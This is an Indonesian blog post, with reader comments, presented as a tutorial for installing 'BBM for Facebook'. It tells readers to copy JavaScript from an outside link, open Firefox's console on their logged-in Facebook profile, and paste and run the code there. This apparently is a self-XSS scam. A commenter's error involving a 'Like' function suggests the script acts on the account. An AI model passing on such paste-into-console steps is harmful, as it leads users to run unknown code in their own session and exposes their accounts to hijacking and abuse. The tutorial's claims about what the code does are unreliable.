Lompat ke konten Lompat ke sidebar Lompat ke footer
Install BBM For Facebook Mudah

Install BBM For Facebook Mudah

Cara Install BBM In Facebook Simple. Blackberry kembali mengeluarkan gebrakan kembali dengan meluncurkan Blackberry Messenger di Facebook. Jadi, aplikasi ini dibuat agar pengguna BBM dapat menjalankannya di akun facebook tanpa harus meninggalkan halaman facebook. Artinya aplikasi ini menyatukan sosial media Facebook dengan BBM.

How to bbm for facebook simple. Cara instal bbm for facebook ini sangat mudah dan gampang untuk Anda pasang. Mungkin ini juga kabar gembira bagi Anda yang belum memiliki Smartphone atau ponsel yang support dengan BBM, Anda dapat BBMan dengan menggunakan cara ini agar dapat BBM dengan teman atau keluarga Anda.

Berikut cara mudah Pasang BBM for Facebook yang lagi menjadi trend dan populer:

- Langkah pertama buka browser "Mozilla Firefox" (sebaiknya jangan menggunakan browser lain) kemudian buka profil Facebook Anda.
- Selanjutnya Copy semua Code Pada Link http://yourjavascript.com/4294435131/bbm-for-facebook.js atau Anda dapat klik di SINI (supaya mudah dan cepat mengcopy dengan Ctrl A lalu Ctrl C dan untuk paste Ctrl V)
- Jika sudah, Anda kembali ke halaman Profil Facebook lagi Lalu Tekan Ctrl+Shift+K pada keyboard secara bersamaan.
- Lalu Paste Code yang tadi di Copy pada kotak paling bawah tepat di depan yang bertanda >> (klik gambar untuk melihat lebih jelasnya)


- Klik Enter bila sudah di paste kan.
- Selesai, tinggal menunggu proses instalasi sampai selesai

Setelah proses pengintallan selesai maka akan muncul tampilan awal BBM di halaman facebook Anda. Itu menandakan Anda sudah dapat langsung menghubungkan dengan sign ke akun BBM untuk menikmati layanan BBM tanpa meninggalkan laman Facebook. Sangat mudah kan bagaimana cara install BBM for Facebook di komputer atau Notebook?

Itulah tips dan trik dari BBM For Faceboook dari Tulisanku. Dan jika Anda belum mempunyai Pin BB, Anda dapat membuatnya dengan mengunjungi situs BB, atau bisa juga numpang daftar pada teman Anda yang mempunyai BBM di Android atau BBM di Komputer.Selamat mencobanya.
Open Comments

3 komentar untuk "Install BBM For Facebook Mudah"

Afdhal Muthalib Sinaga (AmS) 31 Maret 2014 pukul 22.16 Hapus Komentar
tapi dengan cara seperti ni,,..saya sudah coba berulang x dari berbagai sumber.,,.,.
hingga nunggu sampai berjam jam,,,. dan juga belum berhasil,,,.
coba di kasih tahu kesalahan yg lum bisa berhasilnya,.,,.
Ujang Ucon 2 April 2014 pukul 12.44 Hapus Komentar
Mestinya berhasil gan...
Kalo boleh tau ga berhasilnya gimana yah??
Unknown 12 Agustus 2014 pukul 23.11 Hapus Komentar
punyaku erornya gni :
TypeError: Like(...) is not a function
SyntaxError: illegal character